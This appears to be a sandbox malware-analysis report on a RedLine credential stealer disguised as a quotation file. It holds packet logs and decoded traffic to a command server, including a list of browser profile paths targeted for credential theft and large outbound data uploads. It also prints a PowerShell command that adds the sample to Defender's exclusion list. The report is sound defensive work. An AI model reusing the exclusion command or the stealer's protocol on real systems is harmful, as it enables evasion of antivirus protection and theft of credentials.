Nov 12, 2024 18:45:32.288116932 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288130999 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288172960 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288182020 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288196087 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288203955 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288213015 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288286924 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288295031 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288305044 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288480997 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288490057 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288497925 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288507938 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288516045 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288532019 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288539886 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288548946 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288558006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288566113 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288583040 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288590908 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288599968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288609028 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288619041 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288628101 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288639069 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288647890 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288656950 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288665056 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288674116 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288682938 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288691044 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288786888 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288795948 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288805008 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288820982 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288830042 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288839102 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288847923 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288856983 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289055109 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289063931 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289072037 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289081097 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289089918 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289098978 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289113998 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289124012 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289132118 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289140940 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289150000 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289159060 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289167881 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289176941 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289186001 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289249897 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289258957 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289267063 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289271116 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289274931 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289284945 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289294004 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289302111 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289310932 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289319992 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289329052 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289338112 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289345980 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289355040 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289357901 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289361000 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289374113 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289382935 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289392948 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289412975 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289421082 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289725065 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289735079 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289742947 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289757013 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289764881 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289774895 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289784908 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289793968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289802074 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289810896 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289819956 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289829016 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289836884 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289844990 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289861917 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289870977 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289880037 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289889097 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289897919 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289969921 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289978981 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289987087 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289995909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.289999008 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.290003061 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.290090084 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.290098906 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.290107965 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.290117025 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:33.279655933 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:33.301071882 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:33.301233053 CET	49790	13484	192.168.2.7	193.70.111.186

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:45:26.460279942 CET	56537	53	192.168.2.7	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 18:45:26.460279942 CET	192.168.2.7	1.1.1.1	0x9440	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 18:45:26.467403889 CET	1.1.1.1	192.168.2.7	0x9440	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

193.70.111.186:13484

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49715	193.70.111.186	13484	7564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 18:45:19.456084013 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 193.70.111.186:13484 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 12, 2024 18:45:20.265125990 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 12 Nov 2024 17:45:20 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 12, 2024 18:45:25.324585915 CET	224	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 193.70.111.186:13484 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 12, 2024 18:45:26.418301105 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 12 Nov 2024 17:45:26 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49779	193.70.111.186	13484	7564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 18:45:29.808284998 CET	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 193.70.111.186:13484 Content-Length: 929464 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 12, 2024 18:45:31.634689093 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 12 Nov 2024 17:45:31 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49790	193.70.111.186	13484	7564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 18:45:31.643147945 CET	242	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 193.70.111.186:13484 Content-Length: 929456 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 12, 2024 18:45:33.279655933 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 12 Nov 2024 17:45:33 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	12:45:01
Start date:	12/11/2024
Path:	C:\Users\user\Desktop\QUOTATION#09678.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION#09678.exe"
Imagebase:	0x1d8b7350000
File size:	3'192'961 bytes
MD5 hash:	9E31F4B7387356CCDC3678A82846F465
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:45:15
Start date:	12/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:45:15
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:45:16
Start date:	12/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:	0x720000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:45:16
Start date:	12/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	12:45:16
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:45:16
Start date:	12/11/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6704 -s 1332
Imagebase:	0x7ff61c980000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:45:21
Start date:	12/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC890001 Relevance: 7.2, Strings: 4, Instructions: 2239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3J, xrefs: 00007FFAAC8907E5
3J, xrefs: 00007FFAAC890BB2
3J, xrefs: 00007FFAAC890BA0
3J, xrefs: 00007FFAAC890AF2

Memory Dump Source

Source File: 00000000.00000002.1696482352.00007FFAAC890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac890000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: 3J$3J$3J$3J
API String ID: 0-3001255896
Opcode ID: e9dec17efb272c32092a34dbe2c70cb5d4ba6405896ddd6e937055497b52e40d
Instruction ID: 5844e2af7680c5e0fd17f769b235de27d99431e02a1cfaf7924fdcb15e3b79fc
Opcode Fuzzy Hash: e9dec17efb272c32092a34dbe2c70cb5d4ba6405896ddd6e937055497b52e40d
Instruction Fuzzy Hash: 6AE2167280E7868FE756DB6888555A47FE0FF5B310F1841FED08DCB192DA2DA84AC781

Function 00007FFAAC7B9590 Relevance: 7.2, Strings: 5, Instructions: 923
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0#%, xrefs: 00007FFAAC7BE66E
0#%, xrefs: 00007FFAAC7BE5FC
x!%, xrefs: 00007FFAAC7BE40B
CM_H, xrefs: 00007FFAAC7BE2C4
0#%, xrefs: 00007FFAAC7BE613

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: 0#%$0#%$0#%$CM_H$x!%
API String ID: 0-3889653250
Opcode ID: 3354a8de9c245d6f0be80aedcbac791432923ae315c4e0a275c7edacfdeb5441
Instruction ID: 248dbf1f88f0b8b2022adeed5a70bf0600b74cb9d041f426f11c6015009e0f73
Opcode Fuzzy Hash: 3354a8de9c245d6f0be80aedcbac791432923ae315c4e0a275c7edacfdeb5441
Instruction Fuzzy Hash: 4452E630A09A098FEB68DB28C855A7977F1FF5A301B5481BDE45FC7293DE24EC468781

Function 00007FFAAC7BF879 Relevance: 4.2, Strings: 2, Instructions: 1656COMMON

Download Yara Rule

Strings

EM_H, xrefs: 00007FFAAC7BF88E
:M_H, xrefs: 00007FFAAC7C038E

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: :M_H$EM_H
API String ID: 0-2096443360
Opcode ID: 2b55931ce0ad4e6ac28b1e96e18de16024a68cc52fa8fb7b8239be539098ced0
Instruction ID: a2f3f04447ae635954e23c797d49694386e8048c4d0f3fc34d7b613872d0500b
Opcode Fuzzy Hash: 2b55931ce0ad4e6ac28b1e96e18de16024a68cc52fa8fb7b8239be539098ced0
Instruction Fuzzy Hash: B5B2343161DB4A8FE359DB2884814B5B7F1FF96301B1485BEE48AC7296DE34E84AC7C1

Function 00007FFAAC7B5300 Relevance: 3.4, Strings: 1, Instructions: 2120COMMON

Download Yara Rule

Strings

XE%, xrefs: 00007FFAAC7CCDC1

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: XE%
API String ID: 0-1368034947
Opcode ID: 313a86acd1e73dc934fc4dbd2e8daebd7ae163d054ef4e45852cb977462c8978
Instruction ID: 5f422a5d189ff741e4d37992928eb32e2d447fbc94835e742d5c686138e49e66
Opcode Fuzzy Hash: 313a86acd1e73dc934fc4dbd2e8daebd7ae163d054ef4e45852cb977462c8978
Instruction Fuzzy Hash: 10E2143190EA478FF75ACB2884515B57BE1EF96310F1481BED48ECB592DE29E84AC7C0

Function 00007FFAAC7C1417 Relevance: 2.6, Strings: 1, Instructions: 1360COMMON

Download Yara Rule

Strings

0#%, xrefs: 00007FFAAC7C20D9

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

